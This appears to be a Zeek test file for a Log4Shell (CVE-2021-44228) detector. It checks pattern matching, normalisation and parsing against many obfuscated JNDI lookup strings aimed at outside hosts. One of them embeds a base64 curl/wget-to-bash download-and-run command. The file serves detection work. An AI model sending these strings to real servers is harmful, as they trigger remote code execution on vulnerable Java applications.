pk/CapOne-Zeek-Docker
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
CapOne-Zeek-Docker/capitalone/detect/log4j/tests.zeek
Patrick Kelley 04da5c1250 Inital
2025-05-28 14:31:31 -04:00

83 lines
8.2 KiB
Plaintext
Raw Permalink Blame History

module CVE_2021_44228;
type TestCase: record {
s: string;
matches: bool;
norm_s: string;
pp: PayloadParts;
};
function make_test_case(s: string, matches: bool, norm_s: string, uri: string, stem: string, host: string, port_: string): TestCase
{
local pp = PayloadParts($uri=uri, $stem=stem, $host=host, $port_=port_);
return TestCase($s=s, $matches=matches, $norm_s=norm_s, $pp=pp);
}
function payload_equals(p1: PayloadParts, p2: PayloadParts): bool
{
return p1$uri == p2$uri && p1$stem == p2$stem && p1$host == p2$host && p1$port_ == p2$port_;
}
event zeek_init()
{
if ( run_tests )
{
# TODO: Change these to use the table drive tests strategy with `TestCase`
print(exploit_pattern in "https://ad.doubleclick.net/ddm/ad/N5631.507083IPINYOU.COM/B26871807.320905003;sz=1x1;ord=16396029064475833;dc_lat=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;gdpr=${GDPR};gdpr_consent=${GDPR_CONSENT_755}?" == F);
print(exploit_pattern in "/index.php?s=/module/action/param1/${@Die(md5(HelloThinkPHP))}" == F);
print(exploit_pattern in "/index?s=index/\think\Module/Action/Param/${@phpinfo()}" == F);
print(exploit_pattern in "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/ callback}" == T);
print(exploit_pattern in "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}" == T);
print(exploit_pattern in "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=" == T);
print(exploit_pattern in "https://foobarstuff.wiz.biz=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;gdpr=${GDPR};gdpr_consent=${GDPR_CONSENT_755}" == F);
print(normalize("${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=") == "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=");
print(normalize("${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/ callback}") == "${jndi:ldap://world80.log4j.binaryedge.io:80/ callback}");
print(normalize("${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}") == "${jndi:ldap://45.146.164.160:1389/t}");
print(normalize("${jndi:${lower:l${lower:d${lower:a${lower:p}}}}://foo.bar/baz}") == "${jndi:ldap://foo.bar/baz}");
local empty_str_vector: vector of string;
push("1");
print(stack == vector("1"));
push("2");
print(stack == vector("1", "2"));
push("3");
print(stack == vector("1", "2", "3"));
print(peek() == "3");
print(pop() == "3");
print(peek() == "2");
print(pop() == "2");
print(peek() == "1");
print(pop() == "1");
print(peek() == "");
print(pop() == "");
push("1");
push("2");
push("3");
print(stack == vector("1", "2", "3"));
clear_stack();
print(stack == empty_str_vector);
local test_cases: vector of TestCase;
test_cases += make_test_case("${${vgld:jfhv:zyh:c:tvrit:-j}${odm:t:stfd:vaxokx:qanuv:-n}${ufsgjh:tpr:wqlb:-d}${ohq:yyw:ovptvo:ftzg:bemff:-i}:ldap://6pe015373099ca36cc511d.y.psc3evgl.cou}", T, "${jfhv:zyh:c:tvrit:-jt:stfd:vaxokx:qanuv:-ntpr:wqlb:-dyyw:ovptvo:ftzg:bemff:-i:ldap://6pe015373099ca36cc511d.y.psc3evgl.cou}", "6pe015373099ca36cc511d.y.psc3evgl.cou", "6pe015373099ca36cc511d.y.psc3evgl.cou", "6pe015373099ca36cc511d.y.psc3evgl.cou", "-");
test_cases += make_test_case("${jndi:corbal://0.17.149.63:30123/xvalystgst}", T, "${jndi:corbal://0.17.149.63:30123/xvalystgst}", "0.17.149.63:30123/xvalystgst", "0.17.149.63:30123", "0.17.149.63", "30123");
test_cases += make_test_case("${jndi:dns://9-99-149-125.example.net/va}", T, "${jndi:dns://9-99-149-125.example.net/va}", "9-99-149-125.example.net/va", "9-99-149-125.example.net", "9-99-149-125.example.net", "-");
test_cases += make_test_case("${jndi:http://0.8.149.07:30871/xvalystgst}", T, "${jndi:http://0.8.149.07:30871/xvalystgst}", "0.8.149.07:30871/xvalystgst", "0.8.149.07:30871", "0.8.149.07", "30871");
test_cases += make_test_case("${jndi:iiop://0.96.149.90:08425/xvalystgst}", T, "${jndi:iiop://0.96.149.90:08425/xvalystgst}", "0.96.149.90:08425/xvalystgst", "0.96.149.90:08425", "0.96.149.90", "08425");
test_cases += make_test_case("${jndi:ldap://.gf8.rv/mmm}", T, "${jndi:ldap://.gf8.rv/mmm}", ".gf8.rv/mmm", ".gf8.rv", ".gf8.rv", "-");
test_cases += make_test_case("${jndi:ldap://dvuuy_hostnaug./a}", T, "${jndi:ldap://dvuuy_hostnaug./a}", "dvuuy_hostnaug./a", "dvuuy_hostnaug.", "dvuuy_hostnaug.", "-");
test_cases += make_test_case("${jndi:ldap://dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou/gmploit.class}", T, "${jndi:ldap://dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou/gmploit.class}", "dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou/gmploit.class", "dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou", "dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou", "-");
test_cases += make_test_case("${jndi:ldap://jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml/a}", T, "${jndi:ldap://jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml/a}", "jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml/a", "jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml", "jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml", "-");
test_cases += make_test_case("${jndi:ldap://pqn.ae:1954/toucatbypass/dnslof/foo.bar.baz.borz.bizzie.wiz.biz.kk}", T, "${jndi:ldap://pqn.ae:1954/toucatbypass/dnslof/foo.bar.baz.borz.bizzie.wiz.biz.kk}", "pqn.ae:1954/toucatbypass/dnslof/foo.bar.baz.borz.bizzie.wiz.biz.kk", "pqn.ae:1954", "pqn.ae", "1954");
test_cases += make_test_case("${jndi:loqgrn${loqgr:s}://gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co}", T, "${jndi:loqgrns://gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co}", "gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co", "gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co", "gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co", "-");
test_cases += make_test_case("${loqgr${loqgr:n}${loqgr:d}i:l${loqgr:d}${loqgr:a}p://30.137.173.178:1954/t} ${loqgr${loqgr:n}${loqgr:d}i:l${loqgr:d}${loqgr:a}p://30.137.173.178:1954/t} ${loqgr${vppgr:n}${loqgr:d}${vppgr:i}:${loqgr:l}${vppgr:d}${loqgr:a}${vppgr:p}://30.137.173.178:1954/t} j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://30.137.173.178:1954/t j}ngnk_kariablg_gnk_naug:-di${gnk:gnk_naug:-:}${gnk:gnk_naug:-l}d${gnk:gnk_naug:-a}p${gnk:gnk_naug:-:}//30.137.173.178:5851/q ${loqgr${vppgr:n}${loqgr:d}${vppgr:i}:${loqgr:l}${vppgr:d}${loqgr:a}${vppgr:p}://30.137.173.178:1954/t} j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://30.137.173.178:1954/t", T, "${loqgrndi:ldap://30.137.173.178:1954/t} ndi:ldap://30.137.173.178:1954/t} ndi:ldap://30.137.173.178:1954/t} j}n}d}i}:l}d}a}p}://30.137.173.178:1954/t j}ngnk_kariablg_gnk_naug:-dignk_naug:-:}gnk_naug:-l}dgnk_naug:-a}pgnk_naug:-:}//30.137.173.178:5851/q ndi:ldap://30.137.173.178:1954/t} j}n}d}i}:l}d}a}p}://30.137.173.178:1954/t", "30.137.173.178:1954/t", "30.137.173.178:1954", "30.137.173.178", "1954");
for ( i in test_cases )
{
print(test_cases[i]$s);
print(exploit_pattern in test_cases[i]$s == test_cases[i]$matches);
print(normalize(test_cases[i]$s) == test_cases[i]$norm_s);
print(payload_equals(parse_payload(test_cases[i]$s), test_cases[i]$pp));
}
}
}
Reference in New Issue View Git Blame Copy Permalink